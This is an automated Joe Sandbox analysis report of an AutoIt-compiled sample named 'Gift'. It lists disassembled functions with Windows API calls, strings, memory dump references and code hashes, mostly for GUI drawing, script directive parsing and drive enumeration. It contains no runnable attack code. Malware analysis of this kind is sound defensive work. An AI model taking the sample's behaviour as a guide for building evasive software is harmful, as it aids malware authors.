                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                          • String ID:
                                                                          • API String ID: 4124339563-0
                                                                          • Opcode ID: 620c2203b1a089acbdf77f99867d641d652fd039605d2f86639e60d967d906d6
                                                                          • Instruction ID: 8dd903d4700fe114caa06a00d27f476bc72504a69cc0e038050042cebf355bb0
                                                                          • Opcode Fuzzy Hash: 620c2203b1a089acbdf77f99867d641d652fd039605d2f86639e60d967d906d6
                                                                          • Instruction Fuzzy Hash: 07A18D72008701AFD7169F64DC09E6B7BADFF89322F108B19FA62961A0D7B1D844DF52
                                                                          Function 002D2FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(?,?,?), ref: 002D3072
                                                                          • DeleteObject.GDI32(00000000), ref: 002D30B8
                                                                          • DeleteObject.GDI32(00000000), ref: 002D30C3
                                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 002D30CE
                                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 002D30D9
                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0030C77C
                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0030C7B5
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0030CBDE
                                                                            • Part of subcall function 002D1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002D2412,?,00000000,?,?,?,?,002D1AA7,00000000,?), ref: 002D1F76
                                                                          • SendMessageW.USER32(?,00001053), ref: 0030CC1B
                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0030CC32
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0030CC48
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0030CC53
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                          • String ID: 0
                                                                          • API String ID: 464785882-4108050209
                                                                          • Opcode ID: 6b96cb0ce2bcab4281aa420f264988cda0749f7849f7ee442cefebbd93ceaf87
                                                                          • Instruction ID: d5478f429b2b65e71dd954833a0272f5dc1a530b4138be67db4eda2835d67d74
                                                                          • Opcode Fuzzy Hash: 6b96cb0ce2bcab4281aa420f264988cda0749f7849f7ee442cefebbd93ceaf87
                                                                          • Instruction Fuzzy Hash: 6912BF30625201EFDB26CF24C895BA6B7A5FF04301F14966AF985CB2A2C771EC56CF91
                                                                          Function 002E27FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                          • API String ID: 2660009612-1645009161
                                                                          • Opcode ID: dcd41a7b10414b9170b21f9ce7a9469545e678bb111d9434827759746ec07eda
                                                                          • Instruction ID: abc45fc4a1f3d305db65ba7724901a338018a5fe5732c272a68b77c824b44aee
                                                                          • Opcode Fuzzy Hash: dcd41a7b10414b9170b21f9ce7a9469545e678bb111d9434827759746ec07eda
                                                                          • Instruction Fuzzy Hash: FAA1B330A50249FBCB15EF21CD52EBE7778AF45740F544039FD06AB292DBB09A64DB60
                                                                          Function 00347B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(00000000), ref: 00347BC8
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00347C87
                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00347CC5
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00347CD7
                                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00347D1D
                                                                          • GetClientRect.USER32(00000000,?), ref: 00347D29
                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00347D6D
                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00347D7C
                                                                          • GetStockObject.GDI32(00000011), ref: 00347D8C
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00347D90
                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00347DA0
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00347DA9
                                                                          • DeleteDC.GDI32(00000000), ref: 00347DB2
                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00347DDE
                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00347DF5
                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00347E30
                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00347E44
                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00347E55
                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00347E85
                                                                          • GetStockObject.GDI32(00000011), ref: 00347E90
                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00347E9B
                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00347EA5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                          • API String ID: 2910397461-517079104
                                                                          • Opcode ID: 52a882c8504d6ac36589b26d392d245a8e9d7e99d7a7ef3bd9085e97dbe8d62e
                                                                          • Instruction ID: 78da0e5f6790c45ec57b4eb686aa9b1c54454b9594a8a6dfac8cfb3aebf26118
                                                                          • Opcode Fuzzy Hash: 52a882c8504d6ac36589b26d392d245a8e9d7e99d7a7ef3bd9085e97dbe8d62e
                                                                          • Instruction Fuzzy Hash: 30A18DB1A50219BFEB15DBA4DD4AFAF7BADEB04710F008515FA15A72E0C7B1AD00CB64
                                                                          Function 0033B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0033B361
                                                                          • GetDriveTypeW.KERNEL32(?,00362C4C,?,\\.\,00360980), ref: 0033B43E
                                                                          • SetErrorMode.KERNEL32(00000000,00362C4C,?,\\.\,00360980), ref: 0033B59C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DriveType
                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                          • API String ID: 2907320926-4222207086
                                                                          • Opcode ID: 3c94ac0bbf8450cd962606bee3953b04c6203677ded803d18a3882bfd8829665
                                                                          • Instruction ID: ee351aaf503ccdfd5e111b54d85ed6deb16030a0d35c1a1acb74efe18085437f
                                                                          • Opcode Fuzzy Hash: 3c94ac0bbf8450cd962606bee3953b04c6203677ded803d18a3882bfd8829665
                                                                          • Instruction Fuzzy Hash: 9751D431B4030AEBDB02EB21C9C39BDF7A4AF46340F248466F602A7691E771EE51CB55
                                                                          Function 0035A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0035A0F7
                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0035A1B0
                                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 0035A1CC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window
                                                                          • String ID: 0
                                                                          • API String ID: 2326795674-4108050209
                                                                          • Opcode ID: 615e83bee01bbec3c03521e3deeb90d84c1687feec6084403155f94ebe054bad
                                                                          • Instruction ID: e20241230cf00559a17f7f6a776b2a93aeb106ce4303647464053e4400f6487f
                                                                          • Opcode Fuzzy Hash: 615e83bee01bbec3c03521e3deeb90d84c1687feec6084403155f94ebe054bad
                                                                          • Instruction Fuzzy Hash: 7C02FF70108B01AFDB16CF14C849FAABBE8FF45306F048A19F995872B0D775D848EB92
                                                                          Function 0035AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSysColor.USER32(00000012), ref: 0035AF51
                                                                          • SetTextColor.GDI32(?,?), ref: 0035AF55
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0035AF6B
                                                                          • GetSysColor.USER32(0000000F), ref: 0035AF76
                                                                          • CreateSolidBrush.GDI32(?), ref: 0035AF7B
                                                                          • GetSysColor.USER32(00000011), ref: 0035AF93
                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0035AFA1
                                                                          • SelectObject.GDI32(?,00000000), ref: 0035AFB2
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0035AFBB
                                                                          • SelectObject.GDI32(?,?), ref: 0035AFC8
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0035AFE7
                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0035AFFE
                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0035B013
                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0035B05F
                                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0035B086
                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0035B0A4
                                                                          • DrawFocusRect.USER32(?,?), ref: 0035B0AF
                                                                          • GetSysColor.USER32(00000011), ref: 0035B0BD
                                                                          • SetTextColor.GDI32(?,00000000), ref: 0035B0C5
                                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0035B0D9
                                                                          • SelectObject.GDI32(?,0035AC1F), ref: 0035B0F0
                                                                          • DeleteObject.GDI32(?), ref: 0035B0FB
                                                                          • SelectObject.GDI32(?,?), ref: 0035B101
                                                                          • DeleteObject.GDI32(?), ref: 0035B106
                                                                          • SetTextColor.GDI32(?,?), ref: 0035B10C
                                                                          • SetBkColor.GDI32(?,?), ref: 0035B116
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                          • String ID:
                                                                          • API String ID: 1996641542-0
                                                                          • Opcode ID: 84610213aff25a7d7ade250b7d66d39b074a0fcca631e538b01ba6e5cf5c4dcd
                                                                          • Instruction ID: cf17cb31ac0861e288465f3c96ca7e362574b15048c66d59762fa272a0241f27
                                                                          • Opcode Fuzzy Hash: 84610213aff25a7d7ade250b7d66d39b074a0fcca631e538b01ba6e5cf5c4dcd
                                                                          • Instruction Fuzzy Hash: AD617C71900218AFDF169FA4DC49EAFBB79EF08321F118215FA15AB2A1D7B19940DF90
                                                                          Function 00358FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003590EA
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003590FB
                                                                          • CharNextW.USER32(0000014E), ref: 0035912A
                                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0035916B
                                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00359181
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00359192
                                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003591AF
                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 003591FB
                                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00359211
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00359242
                                                                          • _memset.LIBCMT ref: 00359267
                                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003592B0
                                                                          • _memset.LIBCMT ref: 0035930F
                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00359339
                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00359391
                                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 0035943E
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00359460
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003594AA
                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003594D7
                                                                          • DrawMenuBar.USER32(?), ref: 003594E6
                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 0035950E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                          • String ID: 0
                                                                          • API String ID: 1073566785-4108050209
                                                                          • Opcode ID: 564683dc57b750dc67cf1a4d2911433207c1d332b68f9ea3fc6f7f4cf70f332b
                                                                          • Instruction ID: 2ffcd54a83a1b91fa541f4be210cb70aa568239197d93afb902653877399cd07
                                                                          • Opcode Fuzzy Hash: 564683dc57b750dc67cf1a4d2911433207c1d332b68f9ea3fc6f7f4cf70f332b
                                                                          • Instruction Fuzzy Hash: 9AE17C70900218EADF229F54CC85FEE7BBCEB09751F108556FE15AA2A1D7708A99CF60
                                                                          Function 00354ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 00355007
                                                                          • GetDesktopWindow.USER32 ref: 0035501C
                                                                          • GetWindowRect.USER32(00000000), ref: 00355023
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00355085
                                                                          • DestroyWindow.USER32(?), ref: 003550B1
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003550DA
                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003550F8
                                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0035511E
                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00355133
                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00355146
                                                                          • IsWindowVisible.USER32(?), ref: 00355166
                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00355181
                                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00355195
                                                                          • GetWindowRect.USER32(?,?), ref: 003551AD
                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 003551D3
                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 003551ED
                                                                          • CopyRect.USER32(?,?), ref: 00355204
                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 0035526F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                          • String ID: ($0$tooltips_class32
                                                                          • API String ID: 698492251-4156429822
                                                                          • Opcode ID: a132c58ad9a15debbb5900b9bd820f6610097ac86a2788bfa84202e6b31557d8
                                                                          • Instruction ID: 32df4fe3aff5522ba4f80995ef4ced8f5cfb296b3db0f1489c70072ba9a6fede
                                                                          • Opcode Fuzzy Hash: a132c58ad9a15debbb5900b9bd820f6610097ac86a2788bfa84202e6b31557d8
                                                                          • Instruction Fuzzy Hash: 01B18970614740AFDB05DF64C855F6ABBE4FF88311F008919F9999B2A1D7B0EC09CB92
                                                                          Function 0033498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0033499C
                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003349C2
                                                                          • _wcscpy.LIBCMT ref: 003349F0
                                                                          • _wcscmp.LIBCMT ref: 003349FB
                                                                          • _wcscat.LIBCMT ref: 00334A11
                                                                          • _wcsstr.LIBCMT ref: 00334A1C
                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00334A38
                                                                          • _wcscat.LIBCMT ref: 00334A81
                                                                          • _wcscat.LIBCMT ref: 00334A88
                                                                          • _wcsncpy.LIBCMT ref: 00334AB3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                          • API String ID: 699586101-1459072770
                                                                          • Opcode ID: b4984b6a2971067dccb4677905c55f36acf2c17d62dc1228e4c6ea14ab716695
                                                                          • Instruction ID: 2ed36514bd49d181b38d8d844e0b9633838dc969c3e8424dc4cbd77aca36a8f1
                                                                          • Opcode Fuzzy Hash: b4984b6a2971067dccb4677905c55f36acf2c17d62dc1228e4c6ea14ab716695
                                                                          • Instruction Fuzzy Hash: 06414872610209BBDB16B7708C43EBFF77CDF41390F104069FA05A6192EB70EA219AA5
                                                                          Function 002D2BA9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002D2C8C
                                                                          • GetSystemMetrics.USER32(00000007), ref: 002D2C94
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002D2CBF
                                                                          • GetSystemMetrics.USER32(00000008), ref: 002D2CC7
                                                                          • GetSystemMetrics.USER32(00000004), ref: 002D2CEC
                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 002D2D09
                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 002D2D19
                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002D2D4C
                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002D2D60
                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 002D2D7E
                                                                          • GetStockObject.GDI32(00000011), ref: 002D2D9A
                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 002D2DA5
                                                                            • Part of subcall function 002D2714: GetCursorPos.USER32(?), ref: 002D2727
                                                                            • Part of subcall function 002D2714: ScreenToClient.USER32(003977B0,?), ref: 002D2744
                                                                            • Part of subcall function 002D2714: GetAsyncKeyState.USER32(00000001), ref: 002D2769
                                                                            • Part of subcall function 002D2714: GetAsyncKeyState.USER32(00000002), ref: 002D2777
                                                                          • SetTimer.USER32(00000000,00000000,00000028,002D13C7), ref: 002D2DCC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                          • String ID: AutoIt v3 GUI$h6
                                                                          • API String ID: 1458621304-2448167998
                                                                          • Opcode ID: 15f839396f5e430d5630e289187deaf98ea776fb5a40e879146ad19db28332e4
                                                                          • Instruction ID: b7ac87566685d0384092308af1038b39ceefd04c1e26ca5c942a96c7adf55f45
                                                                          • Opcode Fuzzy Hash: 15f839396f5e430d5630e289187deaf98ea776fb5a40e879146ad19db28332e4
                                                                          • Instruction Fuzzy Hash: BAB1507162420ADFDB16DFA8CD56BAE77A8FB18310F118216FA15972D0DBB0AC50CF50
                                                                          Function 002F0429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                          • GetForegroundWindow.USER32(00360980,?,?,?,?,?), ref: 002F04E3
